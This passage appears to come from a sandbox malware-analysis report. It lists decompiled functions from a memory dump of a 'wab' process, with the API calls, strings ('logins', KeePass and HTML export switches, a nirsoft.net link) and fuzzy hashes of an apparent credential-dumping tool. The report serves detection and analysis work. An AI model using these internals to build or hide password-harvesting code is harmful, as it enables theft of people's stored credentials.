                                                • API String ID: 2899246560-1542517562
                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040DBCD
                                                • memset.MSVCRT ref: 0040DBE9
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                • API String ID: 3330709923-517860148
                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040806A
                                                • memset.MSVCRT ref: 0040807F
                                                • _wtoi.MSVCRT ref: 004081AF
                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                • memset.MSVCRT ref: 004081E4
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                • String ID: logins$null
                                                • API String ID: 3492182834-2163367763
                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                • memset.MSVCRT ref: 004085CF
                                                • memset.MSVCRT ref: 004085F1
                                                • memset.MSVCRT ref: 00408606
                                                • strcmp.MSVCRT ref: 00408645
                                                • _mbscpy.MSVCRT ref: 004086DB
                                                • _mbscpy.MSVCRT ref: 004086FA
                                                • memset.MSVCRT ref: 0040870E
                                                • strcmp.MSVCRT ref: 0040876B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                • String ID: ---
                                                • API String ID: 3437578500-2854292027
                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0041087D
                                                • memset.MSVCRT ref: 00410892
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1010922700-0
                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                • malloc.MSVCRT ref: 004186B7
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                • malloc.MSVCRT ref: 004186FE
                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                • String ID: |A
                                                • API String ID: 4233704886-1717621600
                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                • API String ID: 2081463915-1959339147
                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                • API String ID: 2012295524-70141382
                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                • API String ID: 667068680-3953557276
                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 004121FF
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                • memcpy.MSVCRT ref: 0041234D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                • String ID:
                                                • API String ID: 1700100422-0
                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                • String ID:
                                                • API String ID: 552707033-0
                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                • memcpy.MSVCRT ref: 0040C11B
                                                • strchr.MSVCRT ref: 0040C140
                                                • strchr.MSVCRT ref: 0040C151
                                                • _strlwr.MSVCRT ref: 0040C15F
                                                • memset.MSVCRT ref: 0040C17A
                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                • String ID: 4$h
                                                • API String ID: 4066021378-1856150674
                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: %%0.%df
                                                • API String ID: 3473751417-763548558
                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                • GetParent.USER32(?), ref: 00406136
                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                • String ID: A
                                                • API String ID: 2892645895-3554254475
                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                • memset.MSVCRT ref: 0040DA23
                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                • String ID: caption
                                                • API String ID: 973020956-4135340389
                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf$wcscpy
                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                • API String ID: 1283228442-2366825230
